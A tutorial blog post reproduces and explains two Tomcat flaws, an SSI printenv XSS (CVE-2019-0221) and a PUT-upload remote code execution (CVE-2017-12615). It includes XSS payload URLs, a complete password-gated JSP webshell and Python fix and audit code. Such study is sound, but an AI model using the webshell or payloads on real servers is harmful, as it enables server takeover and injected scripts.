This post simulates the whole attack process for two Tomcat vulnerabilities, explains why each one arises, and looks at how the Tomcat developers fixed it.

[Attack 1: XSS attack]

1. SSI technical description

The first vulnerability demonstrated is related to Tomcat's SSI feature. What is SSI?

SSI stands for Server Side Includes. SSI directives are placed in HTML pages and evaluated on the server as the page is served. They let you add dynamically generated content to an existing HTML page without serving the whole page through CGI programs or other dynamic techniques. SSI files use the .shtml suffix by default.

For example, a directive placed in an existing HTML page looks like this:

<!--#echo var="DATE_LOCAL" -->

When the page is served, the directive is replaced by its result, for example:

Sunday, 22-March-2020 18:28:54 GMT

One of the most common uses of SSI is to print the output of CGI programs, such as hit counters. For more details on the technology see: httpd.apache.org/docs/curren…

2. Enable SSI for Tomcat

  1. Prepare the JRE and Tomcat environment. I chose apache-tomcat-9.0.10, which is inside the affected range (Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93).
  2. Edit conf/context.xml (line 19 in this version) to mark the context as privileged, which the SSI servlet requires:
<Context privileged="true">
  3. Edit conf/web.xml to enable the SSI servlet. The block is commented out by default (lines 310-322); remove the comment markers around it:
<servlet>
        <servlet-name>ssi</servlet-name>
        <servlet-class>
          org.apache.catalina.ssi.SSIServlet
        </servlet-class>
        <init-param>
          <param-name>buffered</param-name>
          <param-value>1</param-value>
        </init-param>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>expires</param-name>
          <param-value>666</param-value>
        </init-param>
        <init-param>
          <param-name>isVirtualWebappRelative</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>4</load-on-startup>
    </servlet>
  4. In the same file, uncomment the SSI servlet mapping (lines 422-425) so that requests for *.shtml are routed to the servlet:
    <servlet-mapping>
        <servlet-name>ssi</servlet-name>
        <url-pattern>*.shtml</url-pattern>
    </servlet-mapping>
  5. Create the file madashu_env.shtml (conventionally named printenv.shtml) under the ROOT web application, at webapps/ROOT/ssi/madashu_env.shtml. It echoes the unescaped query string and then dumps every SSI variable:
<html><head><title></title></head><body>
Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>
Env: <!--#printenv -->
</body></html>
  6. Start Tomcat.

3. Launch the attack

  1. Enter the following URL and see what the page does. The query string is the URL-encoded text "<br/><br/><h1>Hello Tomcat，码大叔到此一游</h1><br/><br/>" ("Code Uncle was here"), and the page renders it as markup instead of displaying it as text:
http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
  2. Now inject a script instead; the query string is the URL-encoded "<script>alert('Hello Tomcat，码大叔到此一游')</script>":
http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E

If the attack succeeds, the injected script runs and the browser shows the alert box.

4. Source code analysis

Tomcat fixed the bug quickly after it was reported, and the fix commit can be found on GitHub: Click Commit

And what a neat fix it is!! HTML entity encoding!!

The change touches two files, org.apache.catalina.ssi.SSIMediator and SSIPrintenv.java: the values that printenv writes into the page are now entity-encoded instead of being emitted raw.
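To make the bug and the fix concrete, here is a small model of SSI processing written for this post (it is not Tomcat's code). It handles only the two directives the test page uses, echo and printenv. In the model, echo entity-encodes its value, as Tomcat's echo directive does by default, while printenv writes values raw in the vulnerable mode and entity-encodes them in the fixed mode, which is the shape of the upstream change. Python's html.escape is assumed to be an adequate stand-in for Tomcat's entity encoder, and the page template, variable names and query string are constructed from the post rather than captured from a server.

```python
"""Minimal model of Tomcat SSI processing showing the printenv leak
(CVE-2019-0221) and the entity-encoding fix. Added example, not Tomcat code."""
import html
import re
from urllib.parse import unquote

# The shtml page from the post, as a constructed string
PAGE_TEMPLATE = (
    '<html><head><title></title></head><body>'
    'Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>'
    'Env: <!--#printenv -->'
    '</body></html>'
)

# Query string of the post's second attack URL (Chinese text omitted)
ATTACK_QUERY = "%3Cscript%3Ealert(%27Hello%20Tomcat%27)%3C/script%3E"

DIRECTIVE = re.compile(r'<!--#(\w+)([^>]*?)-->')   # <!--#name attrs -->
ATTR = re.compile(r'(\w+)="([^"]*)"')              # key="value" pairs


def build_env(query_string):
    """The SSI variables that matter here; QUERY_STRING_UNESCAPED is the decoded form."""
    return {
        "DOCUMENT_NAME": "madashu_env.shtml",
        "QUERY_STRING": query_string,
        "QUERY_STRING_UNESCAPED": unquote(query_string),
    }


def printenv(env, escape_values):
    """Render every variable as name=value; escape_values=False is the pre-fix behaviour."""
    enc = (lambda v: html.escape(v, quote=True)) if escape_values else (lambda v: v)
    return "".join(f"{k}={enc(v)}<br/>" for k, v in env.items())


def process_ssi(template, env, fixed):
    """Replace each directive in template with its output; fixed selects the patched printenv."""
    def expand(match):
        name, raw_attrs = match.group(1), match.group(2)
        attrs = dict(ATTR.findall(raw_attrs))
        if name == "echo":
            # echo entity-encodes by default, so it never reflected the script tag
            return html.escape(env.get(attrs.get("var", ""), "(none)"), quote=True)
        if name == "printenv":
            return printenv(env, escape_values=fixed)
        return f"[unsupported directive {name}]"
    return DIRECTIVE.sub(expand, template)


def script_reflected(page):
    """True if an unescaped <script> tag reached the rendered page."""
    return "<script>" in page


if __name__ == "__main__":
    env = build_env(ATTACK_QUERY)
    for fixed in (False, True):
        page = process_ssi(PAGE_TEMPLATE, env, fixed)
        print("fixed" if fixed else "vulnerable", "-> script reflected:", script_reflected(page))
```

Running it shows the raw `<script>` tag coming back through printenv in the vulnerable mode only; in the fixed mode the same value arrives as `&lt;script&gt;`, which the browser displays rather than executes.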

[Attack 2: Remote Code Execution]

Next, I will briefly demonstrate the remote code execution vulnerability, which is high risk. Although it requires a non-default configuration, wherever that configuration is present an attacker can upload a webshell and take control of the server.

  1. Create a malicious JSP file and name it jiansheng.jsp. It is a minimal webshell: when a request carries pwd=023 and a cmd parameter, it runs cmd on the server and returns the output.
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
    // Run a command on the server and capture its standard output
    public static String excuteCmd(String c) {
        StringBuilder line = new StringBuilder();
        try {
            Process pro = Runtime.getRuntime().exec(c);
            BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
            String temp = null;
            while ((temp = buf.readLine()) != null) {
                line.append(temp + "\n");
            }
            buf.close();
        } catch (Exception e) {
            line.append(e.getMessage());
        }
        return line.toString();
    }
%>
<%
    // "pwd" is the webshell's trivial password, "cmd" the command to run
    if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
        out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
    } else {
        out.println(":-)");
    }
%>
  2. Upload the file with an HTTP PUT request, intercepting and editing the request in an HTTP proxy as it is sent.
  3. The upload succeeds, and the attacker can now run commands at will on a Tomcat server that is not their own.
  4. The code involved is short and can be read in JspServlet.java; I will not walk through it here. This issue has a very wide reach: because it comes from configuration rather than one code bug, every branch from 5.x to 9.x is exposed once the DefaultServlet is made writable. The proper fix is to set the DefaultServlet's readonly init-param to true in conf/web.xml, which is also the shipped default.
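As an added check (not from the post or from Tomcat), the following Python audits a Tomcat conf/web.xml and conf/context.xml for the settings the two demos depend on: the SSI servlet and its *.shtml mapping from section 2, together with the privileged context the servlet needs, and the DefaultServlet readonly init-param, whose value false is what lets the PUT upload above succeed. The two web.xml documents below are constructed samples that mirror the shape of Tomcat's file, not copies of it; the parser also ignores XML comments, so a servlet block that is still commented out, as in the shipped file, is correctly reported as disabled.

```python
"""Audit Tomcat conf/web.xml and conf/context.xml for SSI and PUT exposure.
Added example, not part of the post or of Tomcat."""
import xml.etree.ElementTree as ET

# Constructed sample: both risky settings switched on
VULNERABLE_WEB_XML = """
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
  <servlet>
    <servlet-name>ssi</servlet-name>
    <servlet-class>
      org.apache.catalina.ssi.SSIServlet
    </servlet-class>
  </servlet>
  <servlet-mapping><servlet-name>default</servlet-name><url-pattern>/</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>ssi</servlet-name><url-pattern>*.shtml</url-pattern></servlet-mapping>
</web-app>
"""

# Constructed sample: shipped-style defaults, SSI block still commented out, readonly true
HARDENED_WEB_XML = """
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>true</param-value></init-param>
  </servlet>
  <!--
  <servlet>
    <servlet-name>ssi</servlet-name>
    <servlet-class>org.apache.catalina.ssi.SSIServlet</servlet-class>
  </servlet>
  <servlet-mapping><servlet-name>ssi</servlet-name><url-pattern>*.shtml</url-pattern></servlet-mapping>
  -->
  <servlet-mapping><servlet-name>default</servlet-name><url-pattern>/</url-pattern></servlet-mapping>
</web-app>
"""


def _local(tag):
    """Strip the XML namespace so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name):
    found = _children(elem, name)
    return found[0].text.strip() if found and found[0].text else ""


def audit_web_xml(xml_text):
    """Report whether SSI is mapped and whether DefaultServlet accepts PUT."""
    root = ET.fromstring(xml_text)
    servlets = {}
    for s in _children(root, "servlet"):
        params = {_text(p, "param-name"): _text(p, "param-value") for p in _children(s, "init-param")}
        servlets[_text(s, "servlet-name")] = (_text(s, "servlet-class"), params)
    mapped = {_text(m, "servlet-name") for m in _children(root, "servlet-mapping")}

    # SSI is only reachable if the servlet is declared AND has a url-pattern mapping
    ssi_names = [n for n, (cls, _) in servlets.items() if cls.endswith(".SSIServlet")]
    ssi_enabled = any(n in mapped for n in ssi_names)

    # readonly defaults to true; only an explicit "false" lets PUT/DELETE write files
    default_params = [p for cls, p in servlets.values() if cls.endswith(".DefaultServlet")]
    readonly = default_params[0].get("readonly", "true").lower() if default_params else "true"
    return {"ssi_servlet_enabled": ssi_enabled, "default_servlet_writable": readonly == "false"}


def context_is_privileged(context_xml):
    """True if conf/context.xml sets privileged="true", which the SSI servlet requires."""
    root = ET.fromstring(context_xml)
    return root.get("privileged", "false").lower() == "true"


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit_web_xml(doc))
    print("context privileged:", context_is_privileged('<Context privileged="true"></Context>'))
```

On a real installation, read conf/web.xml and conf/context.xml from $CATALINA_BASE and pass their contents to these two functions; a result of default_servlet_writable=True is the condition the PUT upload in this section needs, and ssi_servlet_enabled=True together with a privileged context is the setup from section 2.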

[Conclusion] Interest is the best teacher. By studying the pitfalls the experts have hit and the code they wrote to fix them, we can improve faster, standing on the shoulders of giants. Interested readers can look at Tomcat's published security reports: tomcat.apache.org/security-9…. The two vulnerabilities demonstrated here are CVE-2019-0221 and CVE-2017-12615.

Thank you for following the WeChat public account "码大叔" (Code Uncle). You can also add my personal WeChat, QiaoJS (nickname: Jiansheng; mention Juejin in your note), and we can study and discuss Java together!

WeChat public account 码大叔: ten years honing "code", the old "uncle" blooms.
